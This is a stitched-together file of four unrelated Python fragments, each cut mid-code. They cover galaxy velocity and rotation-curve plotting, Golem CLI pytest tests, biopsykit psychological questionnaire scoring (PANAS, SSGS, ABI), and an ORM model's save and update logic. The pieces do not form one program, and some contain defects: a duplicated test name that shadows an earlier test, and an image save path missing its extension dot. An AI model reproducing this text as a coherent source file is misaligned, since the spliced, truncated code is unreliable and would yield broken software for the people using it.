# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/sMass'):
os.makedirs( IMAGE_DIR + '/sMass')
#######################################################################
plt.savefig(IMAGE_DIR + '/sMass/' + gal_ID + '_sMass.' + IMAGE_FORMAT,
format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, sMass_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_Ha_vel(Ha_vel,
gal_ID,
IMAGE_DIR=None,
FOLDER_NAME=None,
IMAGE_FORMAT='eps',
FILENAME_SUFFIX=None,
ax=None):
'''
Creates a plot of the H-alpha velocity map.
Parameters:
===========
Ha_vel : numpy array of shape (n,n)
H-alpha velocity map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
FOLDER_NAME : string
Name of folder in which to save image
IMAGE_FORMAT : string
Format of saved image. Default is eps
FILENAME_SUFFIX : string
Suffix to append to gal_ID to create image filename
ax : matplotlib.pyplot figure axis object
Axes handle on which to create plot
'''
if ax is None:
fig, ax = plt.subplots()
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = Ha_vel.shape[0] # y-coordinate distance
array_width = Ha_vel.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
minimum = np.min( Ha_vel)
maximum = np.max( Ha_vel)
if minimum > 0:
vmax_bound = maximum
vmin_bound = 0
else:
vmax_bound = np.max( [np.abs(minimum), np.abs(maximum)])
vmin_bound = -vmax_bound
cbar_ticks = np.linspace( vmin_bound, vmax_bound, 11, dtype='int')
ax.set_title( gal_ID + r' H$\alpha$ Velocity')
Ha_vel_im = ax.imshow( Ha_vel, cmap='bwr', origin='lower', vmin = vmin_bound, vmax = vmax_bound)
cbar = plt.colorbar( Ha_vel_im, ax=ax, ticks = cbar_ticks)
cbar.ax.tick_params( direction='in')
cbar.set_label('$v_{rot}$ [km/s]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
###########################################################################
# Create output directory if it does not already exist
#--------------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + FOLDER_NAME):
os.makedirs( IMAGE_DIR + FOLDER_NAME)
###########################################################################
plt.savefig( IMAGE_DIR + FOLDER_NAME + gal_ID + FILENAME_SUFFIX + IMAGE_FORMAT, format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, Ha_vel_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_rot_curve(gal_ID, data_table, IMAGE_DIR=None, IMAGE_FORMAT=None, ax=None):
'''
Plot galaxy rotation curves
Parameters:
===========
gal_ID : string
MaNGA plate number - MaNGA fiberID number
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
ax : matplotlib.pyplot figure axis object
Axes handle on which to create plot
'''
if ax is None:
fig, ax = plt.subplots( figsize=(5, 5))
###########################################################################
ax.set_title( gal_ID + ' Rotation Curves')
ax.plot( data_table['deprojected_distance'], data_table['max_velocity'],
'rs', markersize=5, label='Total (pos)')
ax.plot( data_table['deprojected_distance'], np.abs( data_table['min_velocity']),
'b^', markersize=5, label='Total (neg)')
ax.plot( data_table['deprojected_distance'], data_table['rot_vel_avg'],
'gp', markersize=7, label='Total (avg)')
ax.plot( data_table['deprojected_distance'], data_table['sVel_rot'],
'cD', markersize=4, label='Stellar mass')
ax.plot( data_table['deprojected_distance'], data_table['dmVel_rot'],
'kX', markersize=7, label='Dark matter')
ax.tick_params( axis='both', direction='in')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('Deprojected Radius [kpc/h]')
ax.set_ylabel('Rotational Velocity [km/s]')
ax.legend(loc='upper left')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/rot_curves'):
os.makedirs( IMAGE_DIR + '/rot_curves')
#######################################################################
plt.savefig( IMAGE_DIR + "/rot_curves/" + gal_ID + "_rot_curve." + IMAGE_FORMAT,
format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_mass_curve(IMAGE_DIR, IMAGE_FORMAT, gal_ID, data_table):
'''
Plot the cumulative mass as a function of deprojected radius
Parameters:
===========
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
gal_ID : string
MaNGA plate number - MaNGA fiberID number
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
'''
plt.figure( figsize=(5, 5))
plt.title( gal_ID + ' Mass Curves')
plt.plot( data_table['deprojected_distance'], data_table['mass_interior'],
'gp', markersize=7, label='Total mass (avg)')
plt.plot( data_table['deprojected_distance'], data_table['sMass_interior'],
'cD', markersize=4, label='Stellar mass')
plt.plot( data_table['deprojected_distance'], data_table['dmMass_interior'],
'kX', markersize=7, label='Dark matter mass')
plt.tick_params( axis='both', direction='in')
#ax.yaxis.set_ticks_position('both')
#ax.xaxis.set_ticks_position('both')
plt.xlabel('Deprojected Radius [kpc/h]')
plt.ylabel('Mass Interior [$M_{\odot}$]')
plt.legend(loc='upper left')
if IMAGE_DIR is not None:
########################################################################
# Create output directory if it does not already exist
#-----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/mass_curves'):
os.makedirs( IMAGE_DIR + '/mass_curves')
########################################################################
########################################################################
# Save figure
#-----------------------------------------------------------------------
plt.savefig( IMAGE_DIR + "/mass_curves/" + gal_ID + "_mass_curve." + IMAGE_FORMAT,
format=IMAGE_FORMAT)
########################################################################
########################################################################
# Clean up figure objects
#-----------------------------------------------------------------------
plt.cla()
plt.clf()
plt.close()
gc.collect()
########################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_diagnostic_panel( IMAGE_DIR, IMAGE_FORMAT, gal_ID, v_band, masked_Ha_vel, masked_vel_contour_plot, data_table):
'''
Plot a two by two paneled image containging the entire v-band array, the
masked H-alpha array, the masked H-alpha array containing ovals of the
spaxels processed in the algorithm, and the averaged max and min rotation
curves alongside the stellar mass rotation curve,
Parameters:
===========
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
gal_ID : string
MaNGA plate number - MaNGA fiberID number
v_band : numpy array of shape (n,n)
v_band flux map
masked_Ha_vel : numpy array of shape (n,n)
Masked H-alpha velocity map
masked_vel_contour_plot : numpy array of shape (n,n)
Masked H-alpha velocity map showing only those spaxels within annuli
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
'''
# panel_fig, (( Ha_vel_panel, mHa_vel_panel),
# ( contour_panel, rot_curve_panel)) = plt.subplots( 2, 2)
panel_fig, (( v_band_panel, mHa_vel_panel),
( contour_panel, rot_curve_panel)) = plt.subplots( 2, 2)
panel_fig.set_figheight( 10)
panel_fig.set_figwidth( 10)
plt.suptitle( gal_ID + " Diagnostic Panel", y=1.05, fontsize=16)
plot_vband_image( v_band, gal_ID, ax=v_band_panel)
plot_Ha_vel( masked_Ha_vel, gal_ID, ax=mHa_vel_panel)
plot_Ha_vel( masked_vel_contour_plot, gal_ID, ax=contour_panel)
plot_rot_curve( | |
<reponame>double-sigma/golem
import os
import pytest
import golem
from golem.cli import messages, commands
from golem.core import errors, test_directory
class TestGolemHelp:
run_commands = [
('golem', messages.USAGE_MSG),
('golem -h', messages.USAGE_MSG),
('golem --help', messages.USAGE_MSG),
('golem -h run', messages.RUN_USAGE_MSG),
('golem -h gui', messages.GUI_USAGE_MSG),
('golem -h createproject', messages.CREATEPROJECT_USAGE_MSG),
('golem -h createtest', messages.CREATETEST_USAGE_MSG),
('golem -h createsuite', messages.CREATESUITE_USAGE_MSG),
('golem -h createsuperuser', messages.CREATESUPERUSER_USAGE_MSG),
('golem run -h', messages.RUN_USAGE_MSG),
('golem gui -h', messages.GUI_USAGE_MSG),
]
@pytest.mark.slow
@pytest.mark.parametrize('command,expected', run_commands)
def test_golem_command_output(self, command, expected, testdir_session, test_utils):
os.chdir(testdir_session.path)
result = test_utils.run_command(command)
assert result == expected
@pytest.mark.slow
def test_golem_help_from_non_golem_dir(self, dir_function, test_utils):
# current directory is not a Golem directory
assert dir_function.path == os.getcwd()
result = test_utils.run_command('golem -h')
assert result == messages.USAGE_MSG
class TestGolemDirArg:
"""Test the --golem-dir arg.
This enables Golem to be called from any directory.
"""
@pytest.mark.slow
def test_specify_golem_test_directory_path(self, dir_function, test_utils):
"""The path to the Golem test directory can be specified
using the golem-dir argument
"""
os.chdir(dir_function.path)
golem_dir_name = 'golem_dir'
golem_directory = os.path.join(dir_function.path, golem_dir_name)
commands.createdirectory_command(golem_directory, download_drivers=False)
# createproject command in a non golem directory
# without golem-dir argument
command = 'golem createproject project_one'
result = test_utils.run_command(command)
msg = ('Error: {} is not an valid Golem test directory; '
'.golem file not found'.format(dir_function.path))
assert msg in result
# specify golem-dir with absolute path
command = 'golem --golem-dir {} createproject project_two'.format(golem_directory)
result = test_utils.run_command(command)
assert 'Project project_two created' in result
# specify golem-dir with relative path
command = 'golem --golem-dir {} createproject project_three'.format(golem_dir_name)
result = test_utils.run_command(command)
assert 'Project project_three created' in result
@pytest.mark.slow
def test_golem_dir_arg_does_not_point_to_test_directory(self, dir_function, test_utils):
"""Passing an invalid golem-dir argument value"""
os.chdir(dir_function.path)
dir_name = 'dir_one'
dir_path = os.path.join(dir_function.path, dir_name)
error_msg = 'Error: {} is not an valid Golem test directory; .golem file not found'
command = 'golem --golem-dir {} createproject project_two'
# invalid golem-dir with relative path
result = test_utils.run_command(command.format(dir_name))
assert error_msg.format(dir_path) in result
# invalid golem-dir with absolute path
result = test_utils.run_command(command.format(dir_path))
assert error_msg.format(dir_path) in result
class TestGolemRun:
@pytest.mark.slow
def test_golem_run_test(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test2'
test_utils.create_test(project, test)
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
assert 'INFO Test execution started: {}'.format(test) in result
assert 'INFO Browser: chrome' in result
assert 'INFO Test Result: SUCCESS' in result
@pytest.mark.slow
def test_golem_run_suite_with_no_tests(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
suite = 'suite2'
test_utils.create_suite(project, suite)
command = 'golem run {} {}'.format(project, suite)
result = test_utils.run_command(command)
assert 'No tests found for suite suite2' in result
@pytest.mark.slow
def test_golem_run_no_args(self, project_session, test_utils):
testdir, _ = project_session.activate()
os.chdir(testdir)
result = test_utils.run_command('golem run')
expected = messages.RUN_USAGE_MSG
expected += '\nProjects:'
for project in test_directory.get_projects():
expected += '\n {}'.format(project)
assert result == expected
@pytest.mark.slow
def test_golem_run_test_b_flag(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test2'
command = 'golem createtest {} {}'.format(project, test)
test_utils.run_command(command)
command = 'golem run {} {} -b firefox'.format(project, test)
result = test_utils.run_command(command)
assert 'INFO Test execution started: {}'.format(test) in result
assert 'INFO Browser: firefox' in result
assert 'INFO Test Result: SUCCESS' in result
@pytest.mark.slow
def test_golem_run_not_match_test_or_suite(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test001_does_not_exist'
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
expected = ('golem run: error: the value {} does not match '
'an existing test, suite or directory'.format(test))
assert result == expected
@pytest.mark.slow
def test_golem_run_project_does_not_exist(self, testdir_session, test_utils):
testdir = testdir_session.activate()
os.chdir(testdir)
project = 'project_does_not_exist_4564546'
test = 'test002_does_not_exist'
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
expected = ('golem run: error: the project {0} does not exist'.format(project))
assert result == expected
@pytest.fixture(scope="class")
def _project_with_suite(self, project_class, test_utils):
"""A fixture of a project with class scope with one suite with
one test
"""
testdir, project = project_class.activate()
suite_name = 'suite1'
test_utils.create_test(project, name='test1')
test_utils.create_suite(project, name=suite_name, content=None, tests=['test1'])
project_class.suite_name = suite_name
return project_class
@pytest.mark.slow
def test_generate_reports(self, _project_with_suite, test_utils):
"""Assert that the reports are generated by default in the
report directory and with name: 'report'
"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.001'
cmd = ('golem run {} {} -r html html-no-images junit --timestamp {}'
.format(project, suite_name, timestamp))
test_utils.run_command(cmd)
reportdir = os.path.join(testdir, 'projects', project, 'reports', suite_name, timestamp)
assert os.path.isfile(os.path.join(reportdir, 'report.html'))
assert os.path.isfile(os.path.join(reportdir, 'report-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'report.xml'))
# report.json is generated by default
assert os.path.isfile(os.path.join(reportdir, 'report.json'))
@pytest.mark.slow
def test_generate_reports_with_report_folder(self, _project_with_suite, test_utils):
"""Assert that the reports are generated in the report-folder"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.002'
reportdir = os.path.join(testdir, 'report-folder')
cmd = ('golem run {} {} -r html html-no-images junit json --report-folder {} '
'--timestamp {}'.format(project, suite_name, reportdir, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'report.html'))
assert os.path.isfile(os.path.join(reportdir, 'report-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'report.xml'))
assert os.path.isfile(os.path.join(reportdir, 'report.json'))
@pytest.mark.slow
def test_generate_reports_with_report_folder_report_name(self, _project_with_suite,
test_utils):
"""Assert that the reports are generated in the report-folder with report-name"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.003'
reportdir = os.path.join(testdir, 'projects', project, 'reports', suite_name, timestamp)
report_name = 'foo'
cmd = ('golem run {} {} -r html html-no-images junit json --report-name {} '
'--timestamp {}'.format(project, suite_name, report_name, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'foo.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo.xml'))
assert os.path.isfile(os.path.join(reportdir, 'foo.json'))
@pytest.mark.slow
def test_generate_reports_with_report_folder_report_name(self, _project_with_suite,
test_utils):
"""Assert that the reports are generated in the report-folder with report-name"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.004'
reportdir = os.path.join(testdir, 'report-folder')
report_name = 'foo'
cmd = ('golem run {} {} -r html html-no-images junit json --report-folder {} '
'--report-name {} --timestamp {}'
.format(project, suite_name, reportdir, report_name, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'foo.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo.xml'))
assert os.path.isfile(os.path.join(reportdir, 'foo.json'))
@pytest.mark.slow
def test_golem_run__cli_log_level_arg(self, project_session, test_utils):
"""Set cli-log-level arg, overrides default level (INFO)"""
path, project = project_session.activate()
os.chdir(path)
test_name = test_utils.random_string()
test_content = ('def test(data):\n'
' log("info msg", "INFO")\n'
' log("warning msg", "WARNING")\n')
test_utils.create_test(project, test_name, test_content)
command = 'golem run {} {} --cli-log-level WARNING'.format(project, test_name)
result = test_utils.run_command(command)
assert 'INFO info msg' not in result
assert 'WARNING warning msg' in result
class TestGolemCreateProject:
@pytest.mark.slow
def test_golem_createproject(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
project = test_utils.random_string()
cmd = 'golem createproject {}'.format(project)
result = test_utils.run_command(cmd)
assert result == 'Project {} created'.format(project)
projects = test_directory.get_projects()
assert project in projects
@pytest.mark.slow
def test_golem_createproject_no_args(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
result = test_utils.run_command('golem createproject')
expected = ('usage: golem createproject [-h] project\n'
'golem createproject: error: the following '
'arguments are required: project')
assert result == expected
@pytest.mark.slow
def test_golem_createproject_project_exists(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
cmd = 'golem createproject {}'.format(project)
result = test_utils.run_command(cmd)
expected = ('golem createproject: error: a project with name \'{}\' already exists'
.format(project))
assert result == expected
class TestGolemCreateSuite:
@pytest.mark.slow
def test_golem_createsuite(self, project_session, test_utils):
testdir, project = project_session.activate()
os.chdir(testdir)
suite = test_utils.random_string()
command = 'golem createsuite {} {}'.format(project, suite)
result = test_utils.run_command(command)
msg = 'Suite {} created for project {}'.format(suite, project)
assert result == msg
spath = os.path.join(project_session.path, 'suites', suite+'.py')
assert os.path.isfile(spath)
@pytest.mark.slow
def test_golem_createsuite_no_args(self, project_session, test_utils):
path, _ = project_session.activate()
os.chdir(path)
result = test_utils.run_command('golem createsuite')
expected = ('usage: golem createsuite [-h] project suite\n'
'golem createsuite: error: the following arguments '
'are required: project, suite')
assert result == expected
@pytest.mark.slow
def test_golem_createsuite_project_does_not_exist(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
project = 'project_does_not_exist'
suite = 'suite_test_00002'
cmd = 'golem createsuite {} {}'.format(project, suite)
result = test_utils.run_command(cmd)
expected = ('golem createsuite: error: a project with name {} '
'does not exist'.format(project))
assert result == expected
@pytest.mark.slow
def test_golem_createsuite_already_exists(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
suite = test_utils.random_string()
command = 'golem createsuite {} {}'.format(project, suite)
test_utils.run_command(command)
result = test_utils.run_command(command)
expected = 'golem createsuite: error: A suite with that name already exists'
assert result == expected
class TestGolemCreateTest:
@pytest.mark.slow
def test_golem_createtest(self, project_session, test_utils):
testdir, project = project_session.activate()
os.chdir(testdir)
test = test_utils.random_string()
command = 'golem createtest {} {}'.format(project, test)
result = test_utils.run_command(command)
msg = 'Test {} created for project {}'.format(test, project)
assert result == msg
tpath = os.path.join(project_session.path, 'tests', test+'.py')
assert os.path.isfile(tpath)
@pytest.mark.slow
def test_golem_createtest_no_args(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
result = test_utils.run_command('golem createtest')
expected = ('usage: golem createtest [-h] project test\n'
'golem createtest: error: the following arguments '
'are required: project, test')
assert result == expected
@pytest.mark.slow
def test_golem_createtest_project_not_exist(self, testdir_session, test_utils):
testdir = testdir_session.activate()
os.chdir(testdir)
project = 'project_not_exist'
test = 'test_0004'
cmd = | |
6, 9, 12, 15]
.. note::
This implementation assumes a score range of [1, 5].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
SSGS score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something else than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2008). The psychobiology of trait shame in young women:
Extending the social self preservation theory. *Health Psychology*, 27(5), 523.
<NAME>., <NAME>., & <NAME>. (1994). The state shame and guilt scale.
*Fairfax, VA: George Mason University*.
"""
score_name = "SSGS"
score_range = [1, 5]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 15)
subscales = {
"Pride": [1, 4, 7, 10, 13],
"Shame": [2, 5, 8, 11, 14],
"Guilt": [3, 6, 9, 12, 15],
}
_assert_value_range(data, score_range)
ssgs_data = _compute_questionnaire_subscales(data, score_name, subscales)
return pd.DataFrame(ssgs_data, index=data.index)
def panas(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
language: Optional[Literal["english", "german"]] = None,
) -> pd.DataFrame:
"""Compute the **Positive and Negative Affect Schedule (PANAS)**.
The PANAS assesses *positive affect* (interested, excited, strong, enthusiastic, proud, alert, inspired,
determined, attentive, and active) and *negative affect* (distressed, upset, guilty, scared, hostile, irritable,
ashamed, nervous, jittery, and afraid).
Higher scores on each subscale indicate greater positive or negative affect.
.. note::
This implementation assumes a score range of [1, 5].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
language : "english" or "german", optional
Language of the questionnaire used since index items differ between the german and the english version.
Default: ``english``
Returns
-------
:class:`~pandas.DataFrame`
PANAS score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something else than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., & <NAME>. (1988). Development and validation of brief measures of positive and
negative affect: the PANAS scales. *Journal of personality and social psychology*, 54(6), 1063.
"""
score_name = "PANAS"
score_range = [1, 5]
supported_versions = ["english", "german"]
# create copy of data
data = data.copy()
if language is None:
language = "english"
if language not in supported_versions:
raise ValueError("questionnaire_version must be one of {}, not {}.".format(supported_versions, language))
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 20)
_assert_value_range(data, score_range)
if language == "german":
# German Version has other item indices
subscales = {
"NegativeAffect": [2, 5, 7, 8, 9, 12, 14, 16, 19, 20],
"PositiveAffect": [1, 3, 4, 6, 10, 11, 13, 15, 17, 18],
}
else:
subscales = {
"NegativeAffect": [2, 4, 6, 7, 8, 11, 13, 15, 18, 20],
"PositiveAffect": [1, 3, 5, 9, 10, 12, 14, 16, 17, 19],
}
# PANAS is a mean, not a sum score!
panas_data = _compute_questionnaire_subscales(data, score_name, subscales, agg_type="mean")
data = _invert_subscales(
data, subscales, {"NegativeAffect": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]}, score_range=score_range
)
panas_data[score_name + "_Total"] = data.mean(axis=1)
return pd.DataFrame(panas_data, index=data.index)
def state_rumination(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **State Rumination** scale.
Rumination is the tendency to dwell on negative thoughts and emotions.
Higher scores indicate greater rumination.
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
State Rumination score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., & <NAME>. (1998). The relationship between emotional rumination and cortisol secretion
under stress. *Personality and Individual Differences*, 24(4), 531-538.
"""
score_name = "StateRumination"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 27)
_assert_value_range(data, score_range)
# reverse scores 1, 6, 9, 12, 15, 17, 18, 20, 27
data = invert(data, cols=to_idx([1, 6, 9, 12, 15, 17, 18, 20, 27]), score_range=score_range)
return pd.DataFrame(data.sum(axis=1), columns=[score_name], index=data.index)
# HABIT DATASET
def abi(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Angstbewältigungsinventar (ABI)** (Anxiety Management Inventory).
The ABI measures two key personality constructs in the area of stress or anxiety management:
*Vigilance (VIG)* and *Cognitive Avoidance (KOV)*. *VIG* is defined as a class of coping strategies whose
use aims to, to reduce uncertainty in threatening situations.
In contrast, *KOV* refers to strategies aimed at shielding the organism from arousal-inducing stimuli.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
ABI score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., Angstbewältigung, <NAME>., & VIG, V. (1999).
Das Angstbewältigungs-Inventar (ABI). *Frankfurt am Main*.
"""
score_name = "ABI"
score_range = [1, 2]
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 80)
_assert_value_range(data, score_range)
# split into 8 subitems, consisting of 10 questions each
items = np.split(data, 8, axis=1)
abi_raw = pd.concat(items, keys=[str(i) for i in range(1, len(items) + 1)], axis=1)
idx_kov = {
# ABI-P
"2": [2, 3, 7, 8, 9],
"4": [1, 4, 5, 8, 10],
"6": [2, 3, 5, 6, 7],
"8": [2, 4, 6, 8, 10],
# ABI-E
"1": [2, 3, 6, | |
'_olo_is_breaked', False):
depth = self.__ctx__.instantiate_depth or 0
if not isinstance(_olo_is_new, bool):
_olo_is_new = depth <= 1
self._olo_is_new = _olo_is_new
self._olo_decrypt = _olo_decrypt and not self._olo_is_new
if self._olo_is_new:
self._check_attrs(attrs)
attrs = self._wash_attrs(attrs)
attrs = self._olo_append_default_attrs(attrs)
if self.__encrypted_fields__ and self._olo_decrypt:
attrs = decrypt_attrs(self.__class__, attrs)
self._init()
self._data = attrs
def _init(self):
self._parsed_data = {}
self._dirty_fields = set()
self._orig = None
def _clone(self):
return copy(self)
def _set_orig(self):
if self._olo_is_new:
return
self._orig = self._clone()
@override
def get_uuid(self):
raise NotImplementedError
def get_finally_uuid(self):
uuid = self.get_uuid()
return '{}/props'.format(uuid)
def __getstate__(self):
dct = dict(self.__dict__)
dct.pop('_dirty_fields', None)
dct.pop('_orig', None)
dct.pop('_parsed_data', None)
dct = dict(dct)
_data = dct.get('_data', {})
if _data:
dct['_data'] = dict(_data)
# Return tuple to distinguish the old version
return (dct,)
def __setstate__(self, state):
if isinstance(state, tuple):
self.__dict__.update(state[0])
else:
self._data = state # pragma: no cover
self._init()
@classmethod
def _olo_instantiate(cls, **attrs):
_olo_is_new = attrs.pop('_olo_is_new', False)
return cls._instantiate(_olo_is_new=_olo_is_new, **attrs)
@classmethod
def _instantiate(cls, **attrs):
return cls(**attrs)
@classmethod
def _check_choices(cls, attrs):
for field_name in cls.__choices_field_sets__:
v = attrs.get(field_name, missing)
if v is not missing:
getattr(cls, field_name).validate(v)
def _check_validates(self, attrs):
for field_name, validate in self.__validates__.iteritems():
v = attrs.get(field_name, missing)
if v is not missing:
validate(v)
self.olo_validate()
def _validate_attrs(self, attrs, parse=True, decrypt=True, output=True):
if parse:
parsed_attrs = self._parse_attrs(
attrs, decrypt=decrypt, output=output
)
else:
parsed_attrs = attrs
self._check_choices(parsed_attrs)
self._check_validates(parsed_attrs)
return parsed_attrs
def _clear_cache(self):
delete_cache(self)
def _rollback(self):
if self._orig:
self._data.update(self._orig._data)
self._init()
def is_dirty(self):
return bool(self._dirty_fields)
def save(self):
if self._olo_is_new:
return self._olo_insert()
if not self._dirty_fields:
return False
attrs = {key: getattr(self, key) for key in self._dirty_fields}
is_success = self.update(**attrs)
self._dirty_fields.clear()
return is_success
def update(self, **attrs):
self._check_attrs(attrs)
attrs = self._wash_attrs(attrs)
if not attrs:
return False
if self._orig is None:
self._set_orig()
if self.before_update(**attrs) is False:
self._rollback()
return False
db = self._get_db()
need_updates = {}
for k, v in self.__on_updates__.iteritems():
if k in attrs:
continue
try:
res = v()
except TypeError:
res = v(self)
need_updates[k] = res
attrs = dict(need_updates, **attrs)
expressions, sql_attrs, db_attrs = self._split_attrs(attrs)
